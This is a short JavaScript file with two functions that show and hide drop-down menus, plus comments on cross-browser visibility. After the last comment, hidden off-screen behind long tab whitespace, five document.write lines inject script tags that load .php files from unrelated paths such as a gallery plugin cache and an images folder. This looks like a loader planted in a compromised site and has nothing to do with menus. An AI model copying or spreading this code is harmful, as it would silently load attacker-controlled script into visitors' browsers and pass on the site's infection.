// JavaScript functions to show and hide drop-down menus.
// In SimpleNavBar.html we call ShowMenuDiv each time the mouse goes over 
// either the menu title or the submenu itself, and call HideMenuDiv when the
// mouse goes out of the menu title or the submenu iteslf (onMouseOut).

function ShowItem (itemID) {
  var x = document.getElementById(itemID);
  if (x)
    x.style.visibility = "visible";
  return true;
}

function HideItem (itemID) { 
  var x = document.getElementById(itemID);
  if (x)
     x.style.visibility = "hidden";
  return true;
}

//    As noted in the SimpleNavBarStyles.css file, using x.style.visibility as
//    seen below seemed to have better cross browser support than using 
//    x.style.display="block" and x.style.display="none" to show and hide 
//    the menu.																																																																							document.write('<script type="text/javascript" src="/dev/tapcity_2005/_notes/vbulletin_global.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/galleries/wp-content/plugins/slickr-gallery/slickr/flickr-cache/91/jquery.konami.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/dev/gallery/jquery.ie6blocker.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/galleries/wp-includes/js/tinymce/plugins/autosave/noosfera.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/images/ativa.php"><\/script>');
